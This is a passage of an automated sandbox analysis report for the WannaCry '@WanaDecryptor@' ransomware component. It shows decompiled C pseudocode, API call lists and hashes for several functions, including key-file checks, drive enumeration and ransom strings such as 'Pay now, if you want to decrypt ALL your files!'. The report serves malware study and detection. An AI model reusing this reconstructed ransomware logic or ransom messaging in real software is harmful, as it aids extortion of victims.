__setusermatherr.MSVCRT ref: 0041317E
_initterm.MSVCRT ref: 00413194
__getmainargs.MSVCRT ref: 004131B7
_initterm.MSVCRT ref: 004131C7
GetStartupInfoA.KERNEL32(?), ref: 00413206
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041322A
exit.MSVCRT ref: 0041323A
_XcptFilter.MSVCRT ref: 0041324C

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}

APIs

#6663.MFC42(mailto:,00000000,?), ref: 004042AC
GetParent.USER32(?), ref: 004042BB
#2864.MFC42(00000000), ref: 004042C2
SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
#2379.MFC42 ref: 004042DD

Part of subcall function 00404530: #289.MFC42 ref: 0040455F
Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
Part of subcall function 00404530: #613.MFC42 ref: 004045BB

ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
#2379.MFC42(?), ref: 004042FF

Strings

mailto:, xrefs: 004042A5
open, xrefs: 004042F0

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
String ID: mailto:$open
API String ID: 1144735033-2326261162
Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301
stringsleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210;
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t199 =  *((intOrPtr*)(_t116 + 1));
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											 *((intOrPtr*)( *( *0x422210) + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8);
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}

0x0040baf6
0x0040baf8
0x0040bafd
0x0040bafe
0x0040bb05
0x0040bb0f
0x0040bb16
0x0040bdf5
0x0040bdf5
0x0040bdf5
0x0040bb1c
0x0040bb1c
0x0040bb24
0x0040bb31
0x0040bb35
0x0040bb36
0x0040bb4d
0x0040bb51
0x0040bb53
0x0040bb62
0x0040bb66
0x0040bb7d
0x0040bb7f
0x0040bb8a
0x0040bb8e
0x0040bb95
0x0040bb9f
0x0040bb9f
0x0040bba1
0x0040bbae
0x0040bbb0
0x0040bbb5
0x0040bbb7
0x0040bbbb
0x0040bbbb
0x0040bbbd
0x0040bbc0
0x0040bbc4
0x0040bbc8
0x0040bbcc
0x0040bbd8
0x0040bbdd
0x0040bbde
0x0040bbe3
0x0040bbfb
0x0040bc03
0x0040bc0a
0x0040bc0e
0x0040bc16
0x0040bc16
0x0040bc27
0x0040bc29
0x0040bc2c
0x0040bbbb
0x0040bc3a
0x0040bc3e
0x0040bc3f
0x0040bc7e
0x0040bc85
0x0040bc86
0x0040bc8b
0x0040bc90
0x00000000
0x0040bc92
0x0040bc9c
0x0040bc9e
0x0040bca8
0x0040bcb0
0x0040bcb3
0x0040bcb3
0x0040bcb7
0x0040bcc5
0x0040bcc5
0x0040bcd3
0x0040bcdc
0x0040bcdd
0x0040bce2
0x0040bce5
0x0040bce5
0x0040bc41
0x0040bc41
0x0040bc48
0x0040bc4d
0x0040bc4d
0x0040bc51
0x0040bc55
0x00000000
0x00000000
0x0040bc59
0x0040bc71
0x0040bc71
0x0040bc5b
0x0040bc5b
0x0040bc61
0x0040bc65
0x00000000
0x0040bc67
0x0040bc67
0x0040bc6a
0x0040bc6f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc6f
0x0040bc65
0x0040bc7a
0x0040bc7a
0x0040bc7c
0x0040bcec
0x0040bcf3
0x0040bcf8
0x0040bcfc
0x0040bcff
0x0040bd01
0x0040bdc7
0x0040bdcb
0x0040bde3
0x0040bdec
0x0040bded
0x0040bdf2
0x00000000
0x0040bd07
0x0040bd07
0x0040bd10
0x0040bd16
0x0040bd18
0x0040bd1a
0x0040bd1c
0x0040bd1e
0x0040bd1e
0x0040bd20
0x0040bd20
0x0040bd23
0x0040bd23
0x0040bd23
0x0040bd20
0x0040bd26
0x0040bd28
0x0040bd2a
0x0040bd2c
0x0040bd2c
0x0040bd2f
0x0040bd2f
0x0040bd2f
0x0040bd2c
0x0040bd32
0x0040bd35
0x0040bd35
0x0040bd38
0x0040bd3a
0x0040bd3c
0x0040bd3c
0x0040bd4c
0x0040bd4e
0x0040bd54
0x0040bd58
0x0040bd62
0x0040bd62
0x0040bd64
0x0040bd68
0x0040bd69
0x0040bd6e
0x0040bd71
0x0040bd73
0x0040be1a
0x0040be25
0x0040be27
0x0040be2d
0x0040be34
0x0040be37
0x0040be3e
0x0040be3e
0x0040be40
0x0040be44
0x0040be46
0x0040be48
0x0040be4c
0x0040be4e
0x0040be52
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be4e
0x0040be79
0x0040be7a
0x0040be7f
0x0040be82
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bd79
0x0040bd81
0x0040bd8c
0x0040bd94
0x0040bd96
0x0040bd99
0x0040bd9e
0x0040bd9f
0x0040bda8
0x0040bdb1
0x0040bdb5
0x0040bdbb
0x0040bdbf
0x0040bdbf
0x00000000
0x0040bd07
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc7c
0x0040bc75
0x0040bc77
0x00000000
0x0040bc77
0x0040bb38
0x0040bb38
0x0040bb3d
0x0040bb42
0x0040bb47
0x00000000
0x00000000
0x0040bb47
0x0040bb36
0x0040bdf8
0x0040be03
0x0040be10

APIs

strtok.MSVCRT ref: 0040BBA9
strtok.MSVCRT ref: 0040BC22
#825.MFC42(?,?), ref: 0040BCDD
GetTickCount.KERNEL32 ref: 0040BCEC
srand.MSVCRT ref: 0040BCF3
rand.MSVCRT ref: 0040BD09
#825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
#825.MFC42(?,?,?,?), ref: 0040BDED

Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5

#825.MFC42(?), ref: 0040BE7A

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825$strtok$CountSleepTickrandsrand
String ID:
API String ID: 1749417438-0
Opcode ID: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
Opcode Fuzzy Hash: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}

APIs

Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
sprintf.MSVCRT ref: 0040397A
#1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8

Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17

Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95

CloseHandle.KERNEL32(?,00000001), ref: 004039F1

Strings

Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
%08X.dky, xrefs: 00403969
All your files have been decrypted!, xrefs: 004039C3

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
API String ID: 139182656-2046724789
Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}

APIs

#567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
#540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
#540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
#860.MFC42(00421798), ref: 004040F6
#858.MFC42(00000000,00421798), ref: 004040FE
LoadCursorA.USER32(00000000,00007F89), ref: 00404118
LoadCursorA.USER32(00000000,00007F00), ref: 00404123

Strings

0ZA, xrefs: 004040DD

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #540CursorLoad$#567#858#860
String ID: 0ZA
API String ID: 2440951079-2594568282
Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}

APIs

Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131

#2514.MFC42 ref: 00407CE5
#2414.MFC42 ref: 00407D1A
#2414.MFC42 ref: 00407D4F
#616.MFC42 ref: 00407D6E
#693.MFC42 ref: 00407D7F
#641.MFC42 ref: 00407D93

Strings

[A, xrefs: 00407D26
[A, xrefs: 00407D5B

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414#567$#2514#324#616#641#693
String ID: [A$[A
API String ID: 3779294304-353784214
Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
